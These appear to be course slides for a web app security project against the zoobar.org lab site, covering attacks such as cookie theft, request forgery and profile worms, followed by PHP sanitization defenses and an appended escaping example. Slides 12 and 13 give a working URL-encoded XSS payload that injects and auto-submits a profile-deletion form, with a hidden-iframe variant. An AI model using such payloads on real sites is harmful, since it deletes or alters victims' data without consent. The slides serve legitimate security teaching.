
1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.


Slide 1: Project 2: Web App Security
Collin Jackson, CS 155, Spring 2007

Slide 2: Part 1: Attacks

Slide 3: Overview
Explore several attack types. Each requires both effectiveness and stealth.
Learn:
  How an attacker can evade sanitization
  Consequences of an exploit
  JavaScript
  Very basic CSS

Slide 4: Attacks
A: Cookie Theft: use URL encoding; could hijack session.
B: Request Forgery: navigate browser; use iframes, forms.
C: Password Theft: evade sanitization; handle DOM events.
D: Profile Worm: persistent attack; replicates.
[Diagram: each attack drawn as a flow between a zoobar.org link or form, email, badguy.com and a stanford.edu redirect.]

Slide 5: Sanitization
Works differently depending on context.
  Context: attackstring inside a quoted string. Attack: break out with ' or ". Defense: escape quotes with \.
  Context: attackstring inside HTML markup. Attack: launch script with a <script> tag, or close off the parent tag. Defense: escape angle brackets.
  Context: eval( attackstring ). Attack: do whatever you want. Defense: don't do that.

Slide 6: Example: Profile Deleter
A malicious hyperlink deletes the profile of the user who clicks it.
Only works when the user is logged in:
  User might have multiple tabs open
  Might have chosen, or forgotten, not to log out
  Might appear in another user's profile
Uses the vulnerability in users.php from Attack A.
Constructs a profile deletion form and submits it.

Slide 7: Find vulnerability
The site reflects the query parameter in an input field, so the link can include anything we want there.

Slide 8: Copy form data
View source to find the form fields, then create a copycat form with our modifications.

Slide 9: Close the previous form; a button click triggers the form submit
URL encode, for example with:
  http://scriptasylum.com/tutorials/encdec/encode-decode.html
  http://www.dommermuth-1.com/protosite/experiments/encode/index.html

Slide 10: Debugging
It didn't work. Check the error: open the JavaScript console. "Undefined ... No properties!" Cause: two forms with the same name.

Slide 11: Now with the correct form (fixed version)

Slide 12: Profile deleted
Final test, with users.php replaced by index.php:
http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform %0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C% 2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22 Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28 %29%3C%2Fscript%3E

Slide 13: Stealthier approaches
Post the form into a hidden iframe …
Open the page with the form in a hidden iframe …
  document.myframe.contentDocument.forms[0].profile_update.value = "";

Slide 14: Part 2: Defenses

Slide 15: Goals
Learn:
  How easy it is to make mistakes
  That even simple code can be hard to secure
  Techniques for appropriate input validation
  PHP
  Very basic SQL
A little programming knowledge can be a dangerous thing.

Slide 16: File structure
  index.php
  users.php
  transfer.php
  login.php
  includes/
    auth.php (cookie authentication)
    common.php (includes everything else)
    navigation.php (site template)
  db/
    zoobar/
      Person.txt (must be writable by web server)
Includes /usr/class/cs155/projects/pp2/txt-db-api/…
Only edit these files.

Slide 17: txt-db-api
Third-party text file database library. Data can be int, string, and autoincrement.
Strings need to be escaped: \' \" \\ . In practice magic_quotes_gpc does this for us:
  $recipient = $_POST['recipient']; // already escaped by magic_quotes_gpc
  $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
  $rs = $db->executeQuery($sql);
  if( $rs->next() ) $id = $rs->getCurrentValueByName('PersonID');

Slide 18: Defenses to Part 1
A: Cookie Theft
B: Request Forgery Attack
C: Password Theft
D: Profile Worm

Slide 19: PHP Sanitization Techniques
addslashes(string)
  Prepends a backslash to ' " \
  Already done by magic_quotes_gpc
  Inverse: stripslashes(string)
htmlspecialchars(string [, quote_style])
  Converts & " < > to HTML entities
  Use ENT_QUOTES to also change ' to &#039;
strip_tags(string [, allowable_tags])
  Max tag length 1024
  Does not sanitize tag properties (attributes)
preg_replace(pattern, replacement, subject)
More info: http://php.net

Slide 20: More XSS hunting
Look for untrusted input used as output.
Note the sanitization already applied to each variable: form data has magic_quotes_gpc, db data does not.
Sanitize the output if necessary. There is no penalty for erring on the side of caution, but sanitizing multiple times may lead to problems.
No credit for solving non-goals: SQL injection, etc.
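Applied to the page's own users.php case, the escaping rules on the last two slides look like this (an added PHP example, not the project's code; the helper names are mine, and the txt-db-api string escaping is as slide 17 describes):

```php
<?php
// Added example, not code from the CS155 project or the slides: an
// output-escaping helper for the zoobar-style pages described above.
// The function names are my own; the magic_quotes_gpc handling
// reflects the 2007-era PHP the project assumes.

// Return the raw user input. With magic_quotes_gpc on, form data
// arrives already backslash-escaped while data read from the db does
// not, so every value is normalised to "raw" before any escaping.
function raw_input($form_value) {
    $magic = function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc();
    return $magic ? stripslashes($form_value) : $form_value;
}

// Escape exactly once, at output time, for an HTML body or attribute.
// ENT_QUOTES also maps ' to &#039;, so the result is safe inside
// single-quoted attributes such as value='...'.
function html_escape($raw) {
    return htmlspecialchars($raw, ENT_QUOTES);
}

// Escape for the txt-db-api string context (\' \" \\): the same
// characters magic_quotes_gpc handles, applied once to a raw value.
function db_escape($raw) {
    return addslashes($raw);
}

// The reflected "user" parameter from users.php, rendered as an input
// value. Quotes and angle brackets become entities, so the value can
// no longer close the attribute, the tag or the enclosing form.
function render_user_field($form_value) {
    $safe = html_escape(raw_input($form_value));
    return '<input type="text" name="user" value="' . $safe . '">';
}

// Constructed sample, as it would sit in $_GET['user']: harmless, but it
// contains every character the sanitization slide lists (' " \ < >).
$sample = 'O\'Brien said "hi" <b>there</b> \\ done';
$as_received = (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc())
    ? addslashes($sample) : $sample;

echo render_user_field($as_received), "\n";
echo db_escape($sample), "\n";
// strip_tags keeps every attribute on the tags it allows, so it is no
// substitute for htmlspecialchars where attributes matter.
echo strip_tags('<b title="x">bold</b><i>i</i>', '<b>'), "\n";
// Escaping twice turns " into &amp;quot;: the double-sanitization problem.
echo html_escape(html_escape('"')), "\n";
```

The last two lines show the two caveats from slide 19 and slide 20 directly: strip_tags leaves the title attribute in place, and a second htmlspecialchars pass mangles already-escaped output.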

Slide 21: Good luck!

